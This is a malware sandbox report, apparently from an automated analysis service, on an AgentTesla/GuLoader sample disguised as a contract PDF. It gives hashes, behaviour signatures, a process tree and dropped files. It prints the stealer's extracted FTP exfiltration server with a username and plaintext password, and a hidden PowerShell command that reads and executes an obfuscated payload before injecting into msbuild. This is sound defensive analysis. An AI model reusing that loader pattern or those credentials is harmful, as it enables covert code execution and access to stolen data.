Overview

overview

10

Static

static

1

SÖZLEŞME-pdf.exe

windows7-x64

10

SÖZLEŞME-pdf.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2023 07:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SÖZLEŞME-pdf.exe

  • Size

    701KB

  • MD5

    62078921f530e580c1df7e86bf9975a1

  • SHA1

    6589ad060056166c90136ba0313c1e580e478fdd

  • SHA256

    3c0a5c75a24724f85305ffe4831cc0303f9eaa1e2b3a897a91cb808429b34845

  • SHA512

    b9b3aceba175deffdb04687d885f88de035cc76df590f621a12b55ec798eb218b2d66531d9055cad51dfb5f2e1b8a98c262e467d0716506b567d3691af817dd0

  • SSDEEP

    12288:lwFGHET8v6M1Q0Lxa4cdpv0yLHYGBHj4LrMpKWlnZylgimtdYM3O0V7bb:l5HETcTQ6M4ct8w00ylgZtub0V7

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SÖZLEŞME-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\SÖZLEŞME-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$bungfu=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Dispersionerne.Amb77';$Sjusserne=$bungfu.SubString(50752,3);.$Sjusserne($bungfu)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3736
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4488
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 1860
          4⤵
          • Program crash
          PID:1496
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4488 -ip 4488
    1⤵
      PID:1928

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
      Filesize

      32B

      MD5

      a8ca1db6ae34f5e5c152094f44f92476

      SHA1

      9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

      SHA256

      1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

      SHA512

      e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yohi4hxd.uyd.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Autumn.Fil
      Filesize

      293KB

      MD5

      07f672cc4e0e8d3856b4324b80b59275

      SHA1

      596ceb4b0a3be1029c2be0f633b2f5f4734c4fc0

      SHA256

      a32785d716991ef0b1ab3af1ba58a5d90fbc03a30431d0ff2d538d0bb2cfc5c3

      SHA512

      58a692f5347eada5fa9a97cc5f85b2a4c46419c14b8d0cb67c5d4a6a464b5f2b942ac1c6b10efb0d5a2b7c0f291d85dd8a4878c06fe7996ae6df829bd274354d

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Dispersionerne.Amb77
      Filesize

      49KB

      MD5

      6f471e56b57ed402dd3d0659e4c4489e

      SHA1

      e3f351b01dd96b408599c1165786635d2332012f

      SHA256

      7834c9ab2a3f5f0c1d945474a350d8cc1437502931ef6f115c3a77869ae3ba01

      SHA512

      06773bd5be240c213dc54dc1e4dc2a0f0da40335c15dd93639e8aa4da6a279fa321f395399bb115ed17c6585fc9e2bba3bfca2255bcb02c4f553f9a748ceb8d4

      Download Submit

    • memory/3736-156-0x00000000061F0000-0x0000000006544000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3736-163-0x0000000008020000-0x00000000085C4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3736-144-0x00000000057C0000-0x00000000057E2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3736-145-0x0000000006090000-0x00000000060F6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3736-143-0x00000000052B0000-0x00000000052C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3736-151-0x0000000006100000-0x0000000006166000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3736-141-0x00000000052B0000-0x00000000052C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3736-157-0x0000000006800000-0x000000000681E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3736-169-0x00000000092D0000-0x000000000A278000-memory.dmp

      Filesize

      15.7MB

      Download

    • memory/3736-159-0x00000000052B0000-0x00000000052C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3736-162-0x0000000006D80000-0x0000000006DA2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3736-161-0x0000000006D60000-0x0000000006D7A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3736-160-0x00000000079D0000-0x0000000007A66000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3736-184-0x0000000073350000-0x0000000073B00000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3736-140-0x0000000073350000-0x0000000073B00000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3736-165-0x0000000008C50000-0x00000000092CA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3736-139-0x00000000051A0000-0x00000000051D6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3736-168-0x0000000007D00000-0x0000000007D04000-memory.dmp

      Filesize

      16KB

      Download

    • memory/3736-158-0x0000000006850000-0x000000000689C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3736-142-0x00000000058F0000-0x0000000005F18000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3736-177-0x00000000092D0000-0x000000000A278000-memory.dmp

      Filesize

      15.7MB

      Download

    • memory/3736-173-0x00000000052B0000-0x00000000052C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3736-174-0x00000000052B0000-0x00000000052C0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3736-175-0x0000000076FB1000-0x00000000770D1000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/3736-170-0x00000000092D0000-0x000000000A278000-memory.dmp

      Filesize

      15.7MB

      Download

    • memory/3736-171-0x0000000073350000-0x0000000073B00000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3736-187-0x00000000092D0000-0x000000000A278000-memory.dmp

      Filesize

      15.7MB

      Download

    • memory/4488-188-0x0000000000900000-0x00000000018A8000-memory.dmp

      Filesize

      15.7MB

      Download

    • memory/4488-180-0x000000006E150000-0x000000006F3A4000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4488-181-0x000000006E150000-0x000000006F3A4000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4488-182-0x0000000000900000-0x00000000018A8000-memory.dmp

      Filesize

      15.7MB

      Download

    • memory/4488-183-0x000000006E150000-0x000000006E190000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4488-179-0x0000000077038000-0x0000000077039000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4488-185-0x0000000073350000-0x0000000073B00000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4488-178-0x0000000076FB1000-0x00000000770D1000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/4488-186-0x000000001FA70000-0x000000001FA80000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4488-176-0x0000000000900000-0x00000000018A8000-memory.dmp

      Filesize

      15.7MB

      Download

    • memory/4488-190-0x0000000073350000-0x0000000073B00000-memory.dmp

      Filesize

      7.7MB

      Download